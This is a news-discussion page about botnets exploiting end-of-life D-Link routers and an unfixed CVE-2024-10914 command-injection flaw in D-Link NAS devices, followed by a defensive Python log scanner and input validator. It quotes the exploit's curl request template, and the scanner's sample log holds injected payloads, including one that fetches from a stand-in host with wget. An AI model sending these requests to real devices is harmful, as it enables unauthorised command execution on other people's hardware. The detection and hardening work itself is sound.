from the that-didn't-take-long dept.
Malware botnets exploit outdated D-Link routers in recent attacks:
Two botnets tracked as 'Ficora' and 'Capsaicin' have recorded increased activity in targeting D-Link routers that have reached end of life or are running outdated firmware versions.
The list of targets includes popular D-Link devices used by individuals and organizations such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.
For initial access, the two pieces of malware use known exploits for CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
Once a device is compromised, attackers leverage weaknesses in D-Link's HNAP management interface and execute malicious commands through a GetDeviceSettings action.
The botnets can steal data and execute shell scripts. Attackers appear to compromise the devices for distributed denial-of-service (DDoS) purposes.
Ficora has a widespread geographic distribution with some focus on Japan and the United States. Capsaicin appears to be targeting mostly devices in East Asian countries and increased its activity for just two days, starting on October 21.
[...] One way to prevent botnet malware infections on routers and IoT devices is to ensure that they're running the latest firmware version, which should address known vulnerabilities.
If the device has reached end-of-life and no longer receives security updates, it should be replaced with a new model.
As general advice, you should replace default admin credentials with unique and strong passwords and disable remote access interfaces if they are not needed.
Previously: D-Link Won't Fix Critical Flaw Affecting 60,000 Older NAS Devices
Related Stories
BleepingComputer is reporting that D-Link will not fix security issues associated with CVE-2024-10914 on up to 60,000 of its older NAS devices.
From the article:
More than 60,000 D-Link network-attached storage devices that have reached end-of-life are vulnerable to a command injection vulnerability with a publicly available exploit.
The flaw, tracked as CVE-2024-10914, has a critical 9.2 severity score and is present in the 'cgi_user_add' command where the name parameter is insufficiently sanitized.
An unauthenticated attacker could exploit it to inject arbitrary shell commands by sending specially crafted HTTP GET requests to the devices.
The flaw impacts multiple models of D-Link network-attached storage (NAS) devices that are commonly used by small businesses:
- DNS-320 Version 1.00
- DNS-320LW Version 1.01.0914.2012
- DNS-325 Version 1.01, Version 1.02
- DNS-340L Version 1.08
In a technical write-up that provides exploit details, security researcher Netsecfish says that leveraging the vulnerability requires sending "a crafted HTTP GET request to the NAS device with malicious input in the name parameter."
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
"This curl request constructs a URL that triggers the cgi_user_add command with a name parameter that includes an injected shell command," the researcher explains.
[...]
In a security bulletin today, D-Link has confirmed that a fix for CVE-2024-10914 is not coming and the vendor recommends that users retire vulnerable products.
If that is not possible at the moment, users should at least isolate them from the public internet or place them under stricter access conditions.
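Since D-Link is not shipping a fix, the practical questions for anyone still running one of these NAS boxes are "has someone already tried this against me?" and "what would a correct check on that name parameter have looked like?". The following is an added example (not code from the BleepingComputer article, Netsecfish's write-up, or D-Link's firmware) that answers both: it scans web access log lines for requests matching the quoted cgi_user_add request shape whose decoded name parameter carries shell metacharacters, and it shows an allow-list validator for the name. The log lines are constructed for the example, the user-name rule is an assumption (the page does not document the firmware's own rule), and unsafe_shell_line is a model of the bug class, not D-Link's code.

```python
"""Detect CVE-2024-10914-style command-injection attempts against D-Link NAS
devices in web access logs, and show the allow-list check that would have
prevented the injection.

Added example; not code from the article, the researcher's write-up or the
D-Link firmware.  Log lines below are constructed for the example.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote, urlsplit

# Characters that let a value escape a single-quoted shell argument or chain
# commands.  A legitimate user name never needs any of them.
SHELL_META = set(";|&`$'\"\\\n<>(){}")

# Allow-list for a NAS user name.  Assumption for this example: the real
# firmware's rule is not documented on the page.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3})"
)


def unsafe_shell_line(name: str) -> str:
    """Model of the bug class (assumption, not D-Link's code): the name is
    pasted into a single-quoted shell argument without validation.  A name of
    ';id;' closes the quote, runs id, then reopens the quote, which is why the
    quoted exploit URL-encodes the single quote as %27 around the command."""
    return f"useradd '{name}'"


def validate_username(name: str) -> bool:
    """Hardened check: accept only allow-listed characters, reject otherwise."""
    return USERNAME_RE.fullmatch(name) is not None


def parse_request_target(target: str) -> tuple[str, dict[str, list[str]]]:
    """Split a request target into its path and URL-decoded query parameters."""
    parts = urlsplit(target)
    # keep_blank_values so an empty name= still appears; parse_qs decodes %27 -> '
    return parts.path, parse_qs(parts.query, keep_blank_values=True)


def is_cgi_user_add_injection(target: str) -> bool:
    """True if the request hits account_mgr.cgi with cmd=cgi_user_add and a
    name parameter that contains shell metacharacters after URL decoding."""
    path, params = parse_request_target(target)
    if not path.endswith("/cgi-bin/account_mgr.cgi"):
        return False
    if "cgi_user_add" not in params.get("cmd", []):
        return False
    for name in params.get("name", []):
        # parse_qs decoded once already; decode again to catch %2527-style
        # double encoding aimed at naive pattern matching.
        decoded = unquote(name)
        if any(ch in SHELL_META for ch in decoded):
            return True
    return False


def find_injection_attempts(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (client_ip, request_target) for every log line that looks like
    an injection attempt.  Lines that do not parse are skipped."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_cgi_user_add_injection(m["target"]):
            hits.append((m["ip"], m["target"]))
    return hits


# Constructed sample log (not real traffic); the second line follows the
# request shape quoted in the article, the third is a double-encoded variant.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Nov/2024:12:00:01 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Nov/2024:12:00:02 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 200 0',
    '203.0.113.8 - - [10/Nov/2024:12:00:03 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%2527%3Bwget%2520http%3A%2F%2F203.0.113.9%2Fx%3B%2527 HTTP/1.1" 200 0',
    '10.0.0.6 - - [10/Nov/2024:12:00:04 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_list HTTP/1.1" 200 900',
    '10.0.0.7 - - [10/Nov/2024:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target in find_injection_attempts(SAMPLE_LOG):
        print(f"injection attempt from {ip}: {target}")
    print(unsafe_shell_line("';id;'"))
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; a hit from a public address is a strong sign the box has already been probed, and the only sane follow-up for an end-of-life device is the isolation or retirement D-Link itself recommends. The validator is the shape of fix the vendor declined to ship: reject anything outside a short allow-list instead of trying to strip or escape metacharacters.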
Is this the appropriate way for D-Link to handle this? When told that a previously discovered vulnerability (one whose existence had already been disclosed to them) will be made public, notify the world that the affected devices are "end-of-life" and "end-of-service"?
Do any Soylentils have one of the affected devices? (If so, please place your bank/credit/loan account details on those devices and provide us with IP addresses. Thanks!)
(Score: 2) by drussell on Monday December 30, @08:54PM
Even better, if the device is capable of running it and there is an easily available image, install something like OpenWrt [openwrt.org] on it.